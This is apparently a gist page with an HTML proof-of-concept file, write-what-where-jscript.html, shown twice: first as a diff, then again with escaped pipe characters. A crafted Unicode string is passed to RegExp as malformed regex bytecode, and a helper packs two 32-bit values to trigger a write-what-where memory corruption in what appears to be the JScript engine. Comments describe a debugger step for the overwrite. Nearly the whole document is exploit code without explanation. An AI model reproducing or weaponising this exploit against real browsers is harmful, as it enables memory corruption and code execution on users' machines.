tahaconfiant · July 9, 2020 08:14
diff --git a/write-what-where-jscript.html b/write-what-where-jscript.html
 <!DOCTYPE html>
 <html>
 <head>
 <script>

 function myFunction() {

  var l = "\u614E\u4B74\u01c8\u0000\u0024\u0000\u0159\u0000\u0002\u0000\u0000\u0000\u0001\u0000\u0000\u0000\u0000\u0000" + "\u1E12\u0001\u1200\u0009\u0000\u740A\u1100\u770A\u0400\uFFEF\uFFFF\uFFF7\uFFFF\u0000\u0000\uFFFF\uFFFF\uEF04\uFFFF\uF7FF\uFFFF\u00FF\u0000\uFF00\uFFFF\u04FF\uFFEF\uFFFF\uFFF7\uFFFF\u0000\u0000\uFFFF\uFFFF\uEF04\uFFFF\uF7FF\uFFFF\u00FF\u0000\uFF00\uFFFF\u04FF\uFFEF\uFFFF\uFFF7\uFFFF\u0000\u0000\uFFFF\uFFFF\u0D03\u0000\u0000\u0000\u6F00\u0000\u0300\u000D\u0000\uFFF3\uFFFF\u0000\u0000\u0D03\u0000\uFE00\uFFFF\u00FF\u0000\u0400\uFFEF\uFFFF\u000B\u0000\u0000\u0000\uFFFF\uFFFF\u2B04\u0000\u0000\u0000\u0000\u0000\uFF00\uFFFF\u03FF\u000D\u0000\uFFF3\uFFFF\u000E\u0000\u0112\u0000\u0300\u000D\u0000\uFFF3\uFFFF\u0016\u0000\u0D03\u0000\u0B00\u0000\u0700\u0000\u0300\u000D\u0000\uFFF3\uFFFF\u001A\u0000\u0D03\u0000\u0B00\u0000\u0000\u0000\u0300\u000D\u0000\uFFFB\uFFFF\u0000\u0000\u0D03\u0000\uF300\uFFFF\u1BFF\u0000\u1500\u1312\u0000\u0300\u000D\u0000\uFFDF\uFFFF\u0000\u0000\u030C\u000D\u0000\uFFF0\uFFFF\u0000\u0000\u0AFF\u0073\u6111\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100";

    var test = new RegExp(l);
    test.source; // set breakpoint here, after return from source, overwrite 0x+48 into 0x38

 function S(a, b) {

   try {

    var S_array = [0x0077, 0x0110, 0x0000, 0x0000, 0x0000, ((b & 0xFF) << 8) | 0x03, (b & 0xFFFF00) >> 8, ((a & 0xFF) << 8) | (((b & 0xFF000000) >> 24) & 0xFF), (a & 0xFFFF00) >> 8, (0x07 << 8) | (((a & 0xFF000000) >> 24) & 0xFF)];

    var c = String.fromCharCode.apply(null, S_array);
    test.test(c);
   } catch (d) {}
   return c;
  }
  S(0xAAAAAAAA, 0xBBBBBBBB); // write-what-where
 } 
 </script> 
 </head> 
 <body >

 <button type = "button" onclick = "myFunction()"> Try it </button>

 </body>
 </html>
	<!DOCTYPE html>
	<html>
	<head>
	<script>

	function myFunction() {

	var l = "\u614E\u4B74\u01c8\u0000\u0024\u0000\u0159\u0000\u0002\u0000\u0000\u0000\u0001\u0000\u0000\u0000\u0000\u0000" + "\u1E12\u0001\u1200\u0009\u0000\u740A\u1100\u770A\u0400\uFFEF\uFFFF\uFFF7\uFFFF\u0000\u0000\uFFFF\uFFFF\uEF04\uFFFF\uF7FF\uFFFF\u00FF\u0000\uFF00\uFFFF\u04FF\uFFEF\uFFFF\uFFF7\uFFFF\u0000\u0000\uFFFF\uFFFF\uEF04\uFFFF\uF7FF\uFFFF\u00FF\u0000\uFF00\uFFFF\u04FF\uFFEF\uFFFF\uFFF7\uFFFF\u0000\u0000\uFFFF\uFFFF\u0D03\u0000\u0000\u0000\u6F00\u0000\u0300\u000D\u0000\uFFF3\uFFFF\u0000\u0000\u0D03\u0000\uFE00\uFFFF\u00FF\u0000\u0400\uFFEF\uFFFF\u000B\u0000\u0000\u0000\uFFFF\uFFFF\u2B04\u0000\u0000\u0000\u0000\u0000\uFF00\uFFFF\u03FF\u000D\u0000\uFFF3\uFFFF\u000E\u0000\u0112\u0000\u0300\u000D\u0000\uFFF3\uFFFF\u0016\u0000\u0D03\u0000\u0B00\u0000\u0700\u0000\u0300\u000D\u0000\uFFF3\uFFFF\u001A\u0000\u0D03\u0000\u0B00\u0000\u0000\u0000\u0300\u000D\u0000\uFFFB\uFFFF\u0000\u0000\u0D03\u0000\uF300\uFFFF\u1BFF\u0000\u1500\u1312\u0000\u0300\u000D\u0000\uFFDF\uFFFF\u0000\u0000\u030C\u000D\u0000\uFFF0\uFFFF\u0000\u0000\u0AFF\u0073\u6111\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100";

	var test = new RegExp(l);
	test.source; // set breakpoint here, after return from source, overwrite 0x+48 into 0x38

	function S(a, b) {

	try {

	var S_array = [0x0077, 0x0110, 0x0000, 0x0000, 0x0000, ((b & 0xFF) << 8) \| 0x03, (b & 0xFFFF00) >> 8, ((a & 0xFF) << 8) \| (((b & 0xFF000000) >> 24) & 0xFF), (a & 0xFFFF00) >> 8, (0x07 << 8) \| (((a & 0xFF000000) >> 24) & 0xFF)];

	var c = String.fromCharCode.apply(null, S_array);
	test.test(c);
	} catch (d) {}
	return c;
	}
	S(0xAAAAAAAA, 0xBBBBBBBB); // write-what-where
	}
	</script>
	</head>
	<body >

	<button type = "button" onclick = "myFunction()"> Try it </button>

	</body>
	</html>